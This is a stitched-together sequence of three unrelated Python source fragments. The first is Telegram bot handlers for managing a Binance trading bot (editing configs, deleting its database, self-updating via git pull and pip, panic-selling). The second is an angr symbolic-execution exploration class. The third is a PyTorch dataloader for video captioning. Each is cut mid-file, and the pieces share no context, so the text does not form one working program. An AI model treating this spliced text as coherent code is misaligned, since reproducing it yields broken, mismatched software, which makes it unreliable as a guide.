message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.edit_cfg"):
message, status = buttons.edit_user_cfg()
if status:
reply_text_escape_fun(
message, reply_markup=ReplyKeyboardRemove(), parse_mode="MarkdownV2"
)
return EDIT_USER_CONFIG
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.edit_coin_list"):
message, status = buttons.edit_coin()
if status:
reply_text_escape_fun(
message, reply_markup=ReplyKeyboardRemove(), parse_mode="MarkdownV2"
)
return EDIT_COIN_LIST
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.export_db"):
message, document = buttons.export_db()
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
if document is not None:
settings.CHAT.send_document(
document=document,
filename="crypto_trading.db",
)
elif update.message.text == i18n_format("keyboard.update_tgb"):
message, status = buttons.update_tg_bot()
if status:
kb = [
[i18n_format("keyboard.update"), i18n_format("keyboard.cancel_update")]
]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return UPDATE_TG
else:
reply_text_escape_fun(
message,
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.update_btb"):
message, status = buttons.update_btb()
if status:
kb = [
[i18n_format("keyboard.update"), i18n_format("keyboard.cancel_update")]
]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return UPDATE_BTB
else:
reply_text_escape_fun(
message,
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.execute_script"):
kb, status, message = get_custom_scripts_keyboard()
if status:
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return CUSTOM_SCRIPT
else:
reply_text_escape_fun(
message,
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
return MENU
def edit_coin(update: Update, _: CallbackContext) -> int:
logger.info(f"Editing coin list. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != "/stop":
message = (
f"{i18n_format('coin_list.success')}\n\n"
f"```\n"
f"{update.message.text}\n"
f"```"
)
coin_file_path = os.path.join(settings.ROOT_PATH, "supported_coin_list")
try:
shutil.copyfile(coin_file_path, f"{coin_file_path}.backup")
with open(coin_file_path, "w") as f:
f.write(update.message.text + "\n")
except Exception as e:
logger.error(f"❌ Unable to edit coin list file: {e}", exc_info=True)
message = i18n_format("coin_list.error")
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('coin_list.not_modified')}"
)
keyboard = [[i18n_format("keyboard.go_back")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def edit_user_config(update: Update, _: CallbackContext) -> int:
logger.info(f"Editing user configuration. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != "/stop":
message = (
f"{i18n_format('config.success')}\n\n"
f"```\n"
f"{update.message.text}\n"
f"```"
)
user_cfg_file_path = os.path.join(settings.ROOT_PATH, "user.cfg")
try:
shutil.copyfile(user_cfg_file_path, f"{user_cfg_file_path}.backup")
with open(user_cfg_file_path, "w") as f:
f.write(update.message.text + "\n\n\n")
except Exception as e:
logger.error(
f"❌ Unable to edit user configuration file: {e}", exc_info=True
)
message = i18n_format("config.error")
try:
shutil.copymode(user_cfg_file_path, f"{user_cfg_file_path}.backup")
except:
pass
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('config.not_modified')}"
)
keyboard = [[i18n_format("keyboard.go_back")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def delete_db(update: Update, _: CallbackContext) -> int:
logger.info(
f"Asking if the user really wants to delete the db. ({update.message.text})"
)
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != i18n_format("keyboard.go_back"):
message = i18n_format("db.delete.success")
db_file_path = os.path.join(settings.ROOT_PATH, "data/crypto_trading.db")
pw_file_path = os.path.join(settings.ROOT_PATH, "data/paper_wallet.json")
log_file_path = os.path.join(settings.ROOT_PATH, "logs/crypto_trading.log")
try:
shutil.copyfile(db_file_path, f"{db_file_path}.backup")
os.remove(db_file_path)
if os.path.isfile(pw_file_path):
shutil.copyfile(pw_file_path, f"{pw_file_path}.backup")
os.remove(pw_file_path)
except Exception as e:
logger.error(f"❌ Unable to delete database file: {e}", exc_info=True)
message = i18n_format("db.delete.error")
try:
with open(log_file_path, "w") as f:
f.truncate()
except Exception as e:
logger.error(f"❌ Unable to clear log file: {e}", exc_info=True)
message = i18n_format("db.delete.clear_log_error")
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('db.delete.not_deleted')}"
)
keyboard = [[i18n_format("keyboard.ok")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def update_tg_bot(update: Update, _: CallbackContext) -> int:
logger.info(f"Updating BTB Manager Telegram. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text != i18n_format("keyboard.cancel_update"):
message = i18n_format("update.tgb.updating")
keyboard = [["/start"]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
try:
manager_python_path = sys.executable
subprocess.call(
f"git pull && {manager_python_path} -m pip install -r requirements.txt --upgrade && "
f"{manager_python_path} -m btb_manager_telegram {settings.RAW_ARGS} &",
shell=True,
)
kill_btb_manager_telegram_process()
except Exception as e:
logger.error(f"❌ Unable to update BTB Manager Telegram: {e}", exc_info=True)
message = i18n_format("update.tgb.error")
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('update.tgb.not_updated')}"
)
keyboard = [[i18n_format("keyboard.ok_s")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
return MENU
def update_btb(update: Update, _: CallbackContext) -> int:
logger.info(f"Updating Binance Trade Bot. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
keyboard = [[i18n_format("keyboard.ok_s")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
if update.message.text != i18n_format("keyboard.cancel_update"):
message = (
f"{i18n_format('update.btb.updating')}\n"
f"{i18n_format('update.btb.start_manually')}"
)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
try:
find_and_kill_binance_trade_bot_process()
subprocess.call(
f"cd {settings.ROOT_PATH} && "
f"git pull && "
f"{settings.PYTHON_PATH} -m pip install -r requirements.txt --upgrade",
shell=True,
)
settings.BTB_UPDATE_BROADCASTED_BEFORE = False
except Exception as e:
logger.error(f"Unable to update Binance Trade Bot: {e}", exc_info=True)
message = "Unable to update Binance Trade Bot"
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('update.btb.not_updated')}"
)
reply_text_escape_fun(
message, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
return MENU
def panic(update: Update, _: CallbackContext) -> int:
logger.info(f"Panic Button is doing its job. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
keyboard = [[i18n_format("keyboard.great")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
if update.message.text != i18n_format("keyboard.go_back"):
find_and_kill_binance_trade_bot_process()
# Get current coin pair
db_file_path = os.path.join(settings.ROOT_PATH, "data/crypto_trading.db")
con = sqlite3.connect(db_file_path)
cur = con.cursor()
# Get last trade
cur.execute(
"""SELECT alt_coin_id, crypto_coin_id FROM trade_history ORDER BY datetime DESC LIMIT 1;"""
)
alt_coin_id, crypto_coin_id = cur.fetchone()
# Get Binance api keys and tld
user_cfg_file_path = os.path.join(settings.ROOT_PATH, "user.cfg")
with open(user_cfg_file_path) as cfg:
config = ConfigParser()
config.read_file(cfg)
api_key = config.get("binance_user_config", "api_key")
api_secret_key = config.get("binance_user_config", "api_secret_key")
tld = config.get("binance_user_config", "tld")
if update.message.text != i18n_format("keyboard.stop_sell"):
params = {
"symbol": f"{alt_coin_id}{crypto_coin_id}",
"side": "SELL",
"type": "MARKET",
}
message = send_signed_request(
api_key,
api_secret_key,
f"https://api.binance.{tld}",
"POST",
"/api/v3/order",
payload=params,
)
if update.message.text != i18n_format("keyboard.stop_cancel"):
params = {"symbol": f"{alt_coin_id}{crypto_coin_id}"}
message = send_signed_request(
api_key,
api_secret_key,
f"https://api.binance.{tld}",
"DELETE",
"/api/v3/openOrders",
payload=params,
)
if update.message.text != i18n_format("keyboard.stop_bot"):
message = i18n_format("killed_bot")
else:
message = (
f"{i18n_format('exited_no_change')}\n"
f"{i18n_format('update.btb.not_updated')}"
)
reply_text_escape_fun(message, reply_markup=reply_markup, parse_mode="MarkdownV2")
return MENU
def execute_custom_script(update: Update, _: CallbackContext) -> int:
logger.info(f"Going to 🤖 execute custom script. ({update.message.text})")
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
keyboard = [[i18n_format("keyboard.ok_s")]]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
custom_scripts_path = "./config/custom_scripts.json"
| |
<gh_stars>0
#!/usr/bin/env python3
import time as timer
import sys
import logging
from collections import deque
from angr.exploration_techniques import ExplorationTechnique
import psutil
class ToolChainExplorer(ExplorationTechnique):
"""
TODO
"""
def __init__(
self,
simgr,
max_length,
exp_dir,
nameFileShort,
worker
):
#TODO refactor
super(ToolChainExplorer, self).__init__()
self._max_length = max_length
self.worker = worker
self.timeout = worker.timeout
self.jump_it = worker.jump_it
self.timeout_tab = worker.timeout_tab
self.start_time = timer.time()
self.log = logging.getLogger("ToolChainExplorer")
self.log.setLevel("INFO")
self.max_end_state = worker.max_end_state
self.errored = 0
self.unconstrained = 0
self.deadended = 0
self.active = 1
self.id = 0
self.snapshot_state = {}
self.fork_stack = deque()
self.pause_stash = simgr.stashes["pause"]
self.exp_dir = exp_dir
self.nameFileShort = nameFileShort
self.eval_time = worker.eval_time
self.time_id = 0
self.print_sm_step = True
self.loopBreak_stack = deque()
self.jump_concrete_dict = worker.jump_concrete_dict
self.jump_dict = worker.jump_dict
self.jump_dict[0] = {}
self.jump_concrete_dict[0] = {}
self.loop_counter_concrete = worker.loop_counter_concrete
self.max_step = worker.max_step
self.max_simul_state = worker.max_simul_state
self.max_in_pause_stach = worker.max_in_pause_stach
self.scdg = worker.scdg
self.scdg_fin = [] # TODO from main
self.dict_addr_vis = {}
self.print_on = worker.print_on
self.print_sm_step = worker.print_sm_step
self.print_syscall = worker.print_syscall
self.debug_error = worker.debug_error
self.loopBreak_stack = deque()
self.call_sim = worker.call_sim
self.expl_method = "DFS"
self.memory_limit = worker.memory_limit
def _filter(self, s):
return True
def check_constraint(self, state, value):
try:
val = state.solver.eval_one(value)
is_sao = hasattr(val, "to_claripy")
if is_sao:
val = val.to_claripy()
except Exception:
if self.print_on:
self.log.info("Symbolic value encountered !")
return value
return val
def __proper_formating(self, state, value):
"""
Take a state and a value (argument/return value) and return an appropriate reprensentation to use in SCDG.
"""
if hasattr(value, "to_claripy"):
value = value.to_claripy()
if hasattr(value, "symbolic") and value.symbolic and hasattr(value, "name"):
# self.log.info("case 1 formating")
return value.name
elif (
hasattr(value, "symbolic") and value.symbolic and len(value.variables) == 1
):
# import pdb; pdb.set_trace()
# self.log.info("case 2 formating")
# self.log.info(value.variables)
return list(value.variables)[0]
elif hasattr(value, "symbolic") and value.symbolic:
# self.log.info('case 3 : multiple variables involved')
# TODO improve this
ret = "_".join(list(value.variables))
return ret
else:
# self.log.info("case 4 formating")
try:
val = state.solver.eval_one(value)
return val
except:
return value
def take_smallest(self, simgr, source_stash):
"""
Take a state of source_stash with smallest amount of steps and append it to active stash
@pre : source_stash exists
"""
id_to_move = 0
min_step = 2000
if len(simgr.stashes[source_stash]) > 0:
id_to_move = simgr.stashes[source_stash][0].globals["id"]
min_step = simgr.stashes[source_stash][0].globals["n_steps"]
else:
return
for s in simgr.stashes[source_stash]:
if s.globals["n_steps"] < min_step or (
str(self.check_constraint(s, s.history.jump_target))
not in self.dict_addr_vis
and s.globals["n_steps"] <= min_step
):
id_to_move = s.globals["id"]
min_step = s.globals["n_steps"]
simgr.move(source_stash, "active", lambda s: s.globals["id"] == id_to_move)
def take_longuest(self, simgr, source_stash):
"""
Take a state of source_stash with longuest amount of steps and append it to active stash
@pre : source_stash exists
"""
id_to_move = 0
max_step = 0
if len(simgr.stashes[source_stash]) > 0:
id_to_move = simgr.stashes[source_stash][0].globals["id"]
max_step = simgr.stashes[source_stash][0].globals["n_steps"]
else:
return
for s in simgr.stashes[source_stash]:
if s.globals["n_steps"] > max_step:
id_to_move = s.globals["id"]
max_step = s.globals["n_steps"]
simgr.move(source_stash, "active", lambda s: s.globals["id"] == id_to_move)
def __take_custom(self, simgr, source_stash, moves):
"""
Take a state of source_stash with smallest amount of steps and append it to active stash
@pre : source_stash exists
"""
id_to_move = 0
if len(simgr.stashes[source_stash]) == 0:
return
for s in simgr.stashes[source_stash]:
if (
str(self.check_constraint(s, s.history.jump_target))
not in self.dict_addr_vis
):
id_to_move = s.globals["id"]
simgr.move(
source_stash, "active", lambda s: s.globals["id"] == id_to_move
)
# self.log.info('optimization for exploration used')
return
self.take_smallest(simgr, source_stash)
def __take_custom_deep(self, simgr, source_stash):
id_to_move = 0
if len(simgr.stashes[source_stash]) == 0:
return
for s in simgr.stashes[source_stash]:
if (
str(self.check_constraint(s, s.history.jump_target))
not in self.dict_addr_vis
):
id_to_move = s.globals["id"]
simgr.move(
source_stash, "active", lambda s: s.globals["id"] == id_to_move
)
# self.log.info('optimization for exploration used')
return
self.take_longuest(simgr, source_stash)
def __change_main_state(self, simgr, source_stash):
"""
Take a state of source_stash and append it to active stash
@pre : source_stash exists
"""
if len(simgr.stashes[source_stash]) > 0:
simgr.stashes["active"].append(simgr.stashes[source_stash].pop())
def mv_bad_active(self, simgr):
"""
Take simulation manager and discard states that :
- Exceed max number of step
- Execute too many times a simple loop
"""
# Discard Loop without symbolic variable which takes too much time
for state in simgr.active:
test = str(state.history.jump_target) + "-" + str(state.history.jump_source)
if test in self.jump_concrete_dict[state.globals["id"]]:
self.jump_concrete_dict[state.globals["id"]][test] += 1
else:
self.jump_concrete_dict[state.globals["id"]][test] = 1
if (
self.jump_concrete_dict[state.globals["id"]][test]
> self.loop_counter_concrete
):
# import pdb; pdb.set_trace()
# state.history.trim()
simgr.move(
from_stash="active",
to_stash="ExcessLoop",
filter_func=lambda s: s.globals["id"] == state.globals["id"],
)
self.log.info("A state has been discarded because of simple loop")
if state.globals["n_steps"] % 1000 == 0:
self.log.debug("n_steps = " + str(state.globals["n_steps"]))
if state.globals["n_steps"] > self.max_step:
# import pdb; pdb.set_trace()
state.history.trim()
simgr.move(
from_stash="active",
to_stash="ExcessStep",
filter_func=lambda s: s.globals["id"] == state.globals["id"],
)
self.log.info("A state has been discarded because of max_step reached")
def __mv_new_addr_state(self, simgr):
"""
Check new_addr stash and update it correctly
"""
for s in simgr.stashes["new_addr"]:
if (
str(self.check_constraint(s, s.history.jump_target))
in self.dict_addr_vis
):
id_to_move = s.globals["id"]
simgr.move("new_addr", "pause", lambda s: s.globals["id"] == id_to_move)
# self.log.info('optimization for exploration used')
return
def __update_id_stash(self, simgr, id, new_id):
"""
Inspect active stash
Update two ids that are the same to new_id
Return states have this initial id
"""
found = False
was_excess = False
first_state = None
for state in simgr.active:
if state.globals["id"] == id:
# Case 1 : First state of stash could be a JumpExcedeed, second is not
if found and not state.globals["JumpExcedeed"]:
if was_excess:
state.globals["id"] = new_id
return first_state, state
return state, first_state
# Case 2 : First state of stash could not be a JumpExcedeed, second is !
elif found and state.globals["JumpExcedeed"]:
return state, first_state
# Case 3 : First state of stash IS a jumpExcedeed !
elif not found and state.globals["JumpExcedeed"]:
found = True
was_excess = True
first_state = state
# Case 4 : First state of stash IS NOT a jumpExcedeed !
else:
found = True
state.globals["id"] = new_id
first_state = state
# Was a 'fake' fork
first_state.globals["id"] = id
# Break at specific instruction and open debug mode.
def __debug_instr(self, state):
if state.inspect.instruction == int(
"0x0040123f", 16
) or state.inspect.instruction == int("0x0040126e", 16):
self.log.info("Debug function\n\n")
self.log.info(hex(state.inspect.instruction))
import pdb
pdb.set_trace()
def __debug_read(self, state):
if state.solver.eval(state.inspect.mem_read_address) == int("0xf404120", 16):
self.log.info("Read function\n\n")
self.log.info(state.inspect.mem_read_address)
import pdb
pdb.set_trace()
def __debug_write(self, state):
if state.solver.eval(state.inspect.mem_write_address) == int("0xf404120", 16):
self.log.info("Write function\n\n")
self.log.info(state.inspect.mem_write_address)
import pdb
pdb.set_trace()
def __add_addr_call(self, state):
test = state.globals["addr_call"] + [state.scratch.ins_addr]
state.globals["addr_call"] = test
def __rm_addr_call(self, state):
calls = state.globals["addr_call"]
if len(calls) > 1:
state.globals["addr_call"] = calls[1:]
def step(self, simgr, stash="active", **kwargs):
pass
def build_snapshot(self, simgr):
self.snapshot_state.clear()
for state in simgr.active:
if state.globals["id"] in self.snapshot_state:
self.fork_stack.append(state.globals["id"])
self.snapshot_state[state.globals["id"]] += 1
else:
self.snapshot_state[state.globals["id"]] = 1
state.globals["n_steps"] += 1
def manage_unconstrained(self, simgr):
if len(simgr.unconstrained) > self.unconstrained:
new_unconstrained = len(simgr.unconstrained) - self.unconstrained
for i in range(new_unconstrained):
id_cur = simgr.unconstrained[-1].globals["id"]
self.log.info(
"End of the trace number " + str(id_cur) + " unconstrained"
)
self.unconstrained = len(simgr.unconstrained)
def manage_error(self, simgr):
if len(simgr.errored) > self.errored:
new_errors = len(simgr.errored) - self.errored
self.log.info(simgr.errored)
for i in range(new_errors):
id_cur = simgr.errored[-i - 1].state.globals["id"]
self.log.info("End of the trace number " + str(id_cur) + " with errors")
simgr.errored[-i - 1]
if self.debug_error:
# import pdb
# pdb.set_trace()
# last_error.debug()
pass
self.errored = len(simgr.errored)
def drop_excessed_loop(self, simgr):
excess_loop = len(simgr.stashes["ExcessLoop"]) - (self.max_in_pause_stach / 5)
excess_loop = int(excess_loop) # TODO chris check how we round (up-down)
if excess_loop > 0:
id_to_stash = []
# print(excess_loop)
state_to_stash = simgr.stashes["ExcessLoop"][-excess_loop:]
for t in state_to_stash:
id_to_stash.append(t.globals["id"])
simgr.drop(
filter_func=lambda s: s.globals["id"] in id_to_stash, stash="ExcessLoop"
)
def excessed_step_to_active(self, simgr):
if len(simgr.active) == 0 and len(simgr.stashes["ExcessStep"]) > 0:
moves = min(len(simgr.stashes["ExcessStep"]), self.max_simul_state)
id_move = []
for i in range(moves):
state = simgr.stashes["ExcessStep"][i]
self.id = state.globals["id"]
id_move.append(self.id)
state.globals["n_steps"] = 0
simgr.move(
from_stash="ExcessStep",
to_stash="active",
filter_func=lambda s: s.globals["id"] in id_move,
)
def excessed_loop_to_active(self, simgr):
if len(simgr.active) == 0 and len(simgr.stashes["ExcessLoop"]) > 0:
moves = min(len(simgr.stashes["ExcessLoop"]), self.max_simul_state)
id_move = []
for i in range(moves):
state = simgr.stashes["ExcessLoop"][i]
self.id = state.globals["id"]
id_move.append(self.id)
state.globals["JumpExcedeed"] = False
self.jump_dict[self.id].clear()
self.jump_concrete_dict[self.id].clear()
simgr.move(
from_stash="ExcessLoop",
to_stash="active",
filter_func=lambda s: s.globals["id"] in id_move,
)
def manage_pause(self, simgr):
# If too many states are explored simulateously, move some of them to pause stash.
if len(simgr.active) > self.max_simul_state:
excess = len(simgr.active) - self.max_simul_state
state_to_stash = simgr.active[-excess:]
id_to_stash = []
for t in state_to_stash:
id_to_stash.append(t.globals["id"])
simgr.move(
from_stash="active",
to_stash="pause",
filter_func=lambda s: s.globals["id"] in id_to_stash,
)
# If there is too much states in pause stash, discard some | |
<filename>dataloader.py
# coding:utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import cPickle
import h5py
import os, time, pdb
import numpy as np
import random
import torch
import torch.utils.data as data
import multiprocessing
import pandas as pd
class DataLoader(data.Dataset):
def reset_iterator(self, split):
del self._prefetch_process[split]
self._prefetch_process[split] = BlobFetcher(split,
self, (split == 'train') and (self.opt.shuffle))
self.iterators[split] = 0
def get_vocab_size(self):
return self.vocab_size
def get_dataset_dize(self, mode):
return len(self.split_ix[mode])
def get_vocab(self):
return self.ix_to_word
def get_seq_length(self):
return self.seq_length
def get_other_feats(self, other_features):
other_feats = {'lda': None}
if 'lda' in other_features:
lda_file = h5py.File(self.opt.input_lda_path, 'r')
lda_data = {vid: lda_file[vid].value for vid in lda_file.keys()}
lda_file.close()
other_feats['lda'] = lda_data
return other_feats
def get_c3d_feature(self, video_id):
feature = np.load(os.path.join(self.input_c3d_dir2, video_id + '.npy')).astype('float32')
mean = -0.001915027447565527
var = 1.9239444588254049
feature = (feature - mean) / np.sqrt(var)
att_feature = np.zeros((1, 1, 1)).astype('float32')
return feature, att_feature
def get_twostream_feature(self, video_id):
path = os.path.join(self.opt.input_twostream_dir, 'spatial', 'csv_action', video_id + '.csv')
if not os.path.exists(path):
vid_len = np.load(os.path.join(self.input_c3d_dir2, video_id + '.npy')).astype('float32').shape[0]
att_feature = np.zeros((1, 1, 1)).astype('float32')
return np.zeros((vid_len, 400)), att_feature
spatial = pd.read_csv(path)
OF = pd.read_csv(os.path.join(self.opt.input_twostream_dir, 'OF', 'csv_action', video_id + '.csv'))
if spatial.shape[0] >= OF.shape[0]:
vid_len = OF.shape[0]
else:
vid_len = spatial.shape[0]
feature = np.concatenate((spatial[:vid_len], OF[:vid_len]),1)
att_feature = np.zeros((1, 1, 1)).astype('float32')
return feature,att_feature
def get_data(self, ix):
video_id = self.info['videos'][ix]['video_id']
# feature = np.array(self.feats_c3d[video_id]['c3d_features']).astype('float32')
features, att_features = [], []
if vars(self.opt).get('use_c3d_feature',True):
feature1, att_feature1 = self.get_c3d_feature(video_id)
features.append(feature1)
att_features.append(att_feature1)
if vars(self.opt).get('use_2stream_feature',False):
feature2, att_feature2 = self.get_twostream_feature(video_id)
feature2 = feature2[::2]
att_feature2 = att_feature2[::2]
features.append(feature2)
att_features.append(att_feature2)
vid_len = 1e10
for f in features:
vid_len = f.shape[0] if f.shape[0] < vid_len else vid_len
features = [f[:vid_len] for f in features]
feature = np.concatenate(features, 1).astype('float32')
att_feature = np.concatenate(att_features, 1).astype('float32')
iou_scores, tap_masks, gts_index, gt_featstamps, tap_other = self.get_vid_data(video_id, feature.shape[0])
if self.use_SOTA_tep:
SOTA_featstamps, SOTA_Prop_score, SOTA_timestamps = self.get_SOTA_TEP_label(video_id, feature.shape[0])
else:
SOTA_featstamps = SOTA_Prop_score = SOTA_timestamps = None
w1 = np.array(self.w1).astype('float32')
tap_labels = (iou_scores >= self.opt.iou_threshold)
tap_masks_good_proposal = (iou_scores >= self.opt.iou_threshold_for_good_proposal) # * tap_masks
lda_feat = np.array(self.other_feats['lda'][video_id]).astype('float32') if self.opt.use_lda else np.array(
[0])
other = {}
train_only = {}
other['gt_featstamps'] = gt_featstamps
other['SOTA_featstamps'] = SOTA_featstamps
other['SOTA_timestamps'] = SOTA_timestamps
other['SOTA_Prop_score'] = SOTA_Prop_score
# if ix < self.train_length: # if ix is in training set
if True:
tap_gts_for_good_proposal = (tap_masks_good_proposal * (gts_index + 1) - 1).astype('int')
proposal_num = (tap_gts_for_good_proposal >= 0).sum()
# assert ncap == tap_gts_for_good_proposal.max() + 1
other['tap_gts_for_good_proposal'] = tap_gts_for_good_proposal
if self.opt.tap_model == "sst_1stage" and proposal_num > 0:
tap_list, lm_list, soi_list, sampled_ids, action_label = self.get_shuffle_list(tap_gts_for_good_proposal,gt_featstamps,
method='1stage')
other['action_label'] = action_label
else:
tap_list, lm_list, soi_list, sampled_ids = self.get_shuffle_list(tap_gts_for_good_proposal,gt_featstamps,
method='random')
train_only['ind_select_list'] = np.array(tap_list[sampled_ids]).astype('int') # sampled
train_only['ind_select_list_eval'] = np.array(tap_list).astype('int') # sampled
train_only['cg_select_list'] = np.array(lm_list[sampled_ids]).astype('int') # sampled
train_only['soi_select_list'] = np.array(soi_list[sampled_ids]).astype('int') # sampled
train_only['soi_select_list_eval'] = np.array(soi_list).astype('int') # sampled
train_only['sampled_ids'] = np.array(sampled_ids).astype('int')
return [feature,
lda_feat,
att_feature,
tap_labels,
tap_masks,
iou_scores,
gts_index,
tap_masks_good_proposal,
train_only,
# tap_good_proposal_info,
w1,
ix,
other]
def __init__(self, opt):
# initial some variables
self.opt = opt
self.batch_size = self.opt.batch_size
self.use_att = getattr(opt, 'use_att', False)
self.iou_threshold = self.opt.iou_threshold
self.iou_threshold_good = self.opt.iou_threshold_for_good_proposal
# self.label_file_for_tap = self.opt.label_file_for_tap
self.input_c3d_dir2 = opt.input_c3d_dir2
with open(self.opt.w1_json) as f:
self.w1 = json.load(f)
with open(self.opt.video_json) as f:
self.data = json.load(f)
self.use_SOTA_tep = vars(self.opt).get('SOTA_json', None)
if self.use_SOTA_tep:
with open(self.opt.SOTA_json) as f:
self.SOTA_TEP_Poporal = json.load(f)['results']
self.K = self.opt.K
self.prop_sample_num = opt.prop_sample_num
# load json file which contains additional information about dataset
print('DataLoader loading features file: ', opt.input_c3d_dir2)
print('DataLoader loading train label file: ', opt.train_label_for_cg)
print('DataLoader loading val label file: ', opt.val_label_for_cg)
with open(self.opt.video_data_for_cg) as f:
self.info = json.load(f)
print('DataLoader loading video_data_information file: ', opt.video_data_for_cg)
self.ix_to_word = self.info['ix_to_word']
self.vocab_size = len(self.ix_to_word)
print('vocab size is ', self.vocab_size)
# open the label file
train_label_h5 = h5py.File(self.opt.train_label_for_cg, 'r', driver='core')
self.train_label_file = {key: train_label_h5[key].value for
key in train_label_h5.keys()}
train_label_h5.close()
val_label_h5 = h5py.File(self.opt.val_label_for_cg, 'r', )
self.val_label_file = {key: val_label_h5[key].value for key in
val_label_h5.keys()}
val_label_h5.close()
if vars(self.opt).get('other_features', 0) != 0:
self.other_feats = self.get_other_feats(self.opt.other_features)
seq_size = self.train_label_file['labels'].shape
self.seq_length = seq_size[1]
print('max sequence length in data is', self.seq_length)
# load the index of sentences for all videos
# end_ix - start_ix is the number of senteces for a video
self.train_label_start_ix = self.train_label_file['label_start_ix'][:]
self.train_label_end_ix = self.train_label_file['label_end_ix'][:]
self.val_label_start_ix = self.val_label_file['label_start_ix'][:]
self.val_label_end_ix = self.val_label_file['label_end_ix'][:]
self.val_videos = self.val_label_start_ix.shape[0]
self.train_videos = self.train_label_start_ix.shape[0]
print('there are %d videos to be trained' % (self.train_videos))
print("there are %d videos in validation " % (self.val_videos))
self.split_ix = {'train': [], 'val': [], 'test': []}
# separate out indexes for each of the provided splits
for ix in range(len(self.info['videos'])):
# if ix % 10 != 0:
# continue
video = self.info['videos'][ix]
if video['split'] == 'train':
self.split_ix['train'].append(ix)
elif video['split'] == 'val':
self.split_ix['val'].append(ix)
elif video['split'] == 'test':
self.split_ix['test'].append(ix)
elif opt.train_only == 0: # restval
self.split_ix['train'].append(ix)
print('assigned %d videos to split train' % len(self.split_ix['train']))
print('assigned %d videos to split val' % len(self.split_ix['val']))
print('assigned %d videos to split test' % len(self.split_ix['test']))
self.train_length = self.train_videos
self.val_length = self.val_videos
# self.test_length = len(self.split_ix['test'])
self.iterators = {'train': 0, 'val': 0, 'test': 0}
self._prefetch_process = {} # The three prefetch process
for split in self.iterators.keys():
self._prefetch_process[split] = BlobFetcher(split,
self, (split == 'train') and (opt.shuffle))
# BlobFetcher(train,self,train)
# Terminate the child process when the parent exists
def cleanup():
print('Terminating BlobFetcher')
for split in self.iterators.keys():
del self._prefetch_process[split]
import atexit
atexit.register(cleanup)
# calculate the iou value
def iou(self, interval, featstamps, return_index=False):
start_i, end_i = interval[0], interval[1]
output = 0.0
gt_index = -1
for i, (start, end) in enumerate(featstamps):
start = start - 0.01
end = end + 0.01
intersection = max(0, min(end, end_i) - max(start, start_i))
union = min(max(end, end_i) - min(start, start_i), end - start + end_i - start_i)
overlap = float(intersection) / (union + 1e-8)
if overlap >= output:
output = overlap
gt_index = i
if return_index:
return output, gt_index
return output
def event_distance(self, featstamps1, featstamp2):
s1, e1 = featstamps1
s2, e2 = featstamp2
intersection = max(0, min(e1, e2) - max(s1, s2))
union = min(max(e1, e2) - min(s1, s2), e1 - s1 + e2 - s2)
d = float(intersection) / (e1 - s1) + float(intersection) / (e2 - s2)
return d
# calculat the features for each gt proposal
def timestamp_to_featstamp(self, timestamp, nfeats, duration):
start, end = timestamp
start = max(min(int(round(start / duration * nfeats)), nfeats - 2), 0)
end = min(max(int(round(end / duration * nfeats)), start + 1), nfeats - 1)
return start, end
